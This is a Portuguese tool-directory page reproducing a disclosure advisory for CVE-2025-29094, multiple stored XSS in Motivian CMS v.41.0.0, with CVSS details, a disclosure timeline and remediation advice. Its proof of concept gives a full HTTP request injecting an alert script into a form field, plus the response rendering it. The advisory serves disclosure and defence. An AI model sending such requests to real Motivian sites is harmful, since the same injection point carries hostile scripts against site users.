Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0. | Kitploit
Ferramentas/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0.

Ver Repositório
2há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0.

  • CVE-2025-29094: Múltiplos Cross-Site Scripting (XSS) Armazenados

Esta vulnerabilidade foi reportada ao fornecedor de acordo com as práticas de divulgação responsável, e à MITRE, que atribuiu um ID CVE temporário. Os detalhes estão sendo tornados públicos após o término do período de divulgação de 45 dias.

Informações Gerais

  • Título: Motivian Cross-Site Scripting (XSS) Armazenado
  • Tipo de Vulnerabilidade: XSS Armazenado
  • Fornecedor do Produto: Motivian
  • Produto: Motivian Content Management System
  • Versão Afetada: Motivian CMS v.41.0.0
  • Componentes Afetados: Marketing/Forms, Marketing/Offers, Content/Pages
  • Vetor de Ataque: Remoto
  • Impacto: Execução arbitrária de JavaScript no navegador da vítima
  • Severidade: Alta
  • Pontuação CVSSv3: 7.6
  • Vetor CVSSv3: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • Severidade por CISA-ADP: Média
  • Pontuação CVSSv3 por CISA-ADP: 6.1
  • Vetor CVSSv3 por CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Descoberta: 2025-01-29
  • Por: Francesco Marcuccio
  • Status: Reportada ao fornecedor em 7 de abril de 2025 - Nenhuma resposta/correção recebida até 22 de maio de 2025
  • Descrição

    A vulnerabilidade de Cross-Site Scripting no Motivian Content Mangment System v.41.0.0 permite que um atacante remoto execute código arbitrário por meio dos componentes Marketing/Forms, Marketing/Offers e Content/Pages. A vulnerabilidade foi explorada ao injetar código JavaScript malicioso em vários campos, incluindo o título em Marketing/Form e Marketing/Offers, e o campo header script em Content/Pages

    Prova de Conceito

    A vulnerabilidade pode ser explorada por meio de vários campos em diferentes componentes. Para fins de demonstração, a prova de conceito a seguir concentra-se em um cenário específico:

    1. Navegue até a seção Marketing/Forms e crie um novo elemento de formulário.
    2. Insira um script malicioso no campo Name e salve o formulário.

    Abaixo está a transcrição completa das requisições e respostas HTTP usadas para demonstrar o problema:

    Requisição Burp

    root@kitploit:~
    POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
    Host: [REDACTED]
    Content-Length: 1362
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: [REDACTED]
    Connection: close
    
    targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
    

    Resposta Burp

    root@kitploit:~
    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 05 Feb 2025 12:00:09 GMT
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: it-IT
    Content-Length: 94593
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/main/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
    

    Remediação

    Sanitize toda a entrada do usuário e aplique escape à saída antes de renderizar. Implemente o cabeçalho CSP (Content Security Policy) para mitigar riscos de XSS.

    Linha do Tempo da Divulgação

    DateAction
    2025-02-06Solicitação de ID CVE (CNA: MITRE)
    2025-04-02Atribuição de ID CVE
    2025-04-07Vulnerabilidades reportadas ao fornecedor
    2025-05-31Divulgação pública após o término do período de divulgação de 45 dias (54 dias no total)
    2025-06-04Registro oficial e entrada no banco de dados da MITRE e no portal NIST/NVD

    Crédito

    • Descoberta e divulgada de forma responsável por:
      Francesco Marcuccio
      Consultor de Cibersegurança, Penetration Tester

    • Atribuição do descobridor pela MITRE listada como:
      Francesco Marcuccio
      Consultor de Cibersegurança, Penetration Tester

    Links

    Links de referência: MITRE NIST

    Status

    Este ID CVE está oficialmente no status PUBLISHED. Ele será atualizado com a pontuação CVSS pela NIST, após análise.

    Baixar ferramenta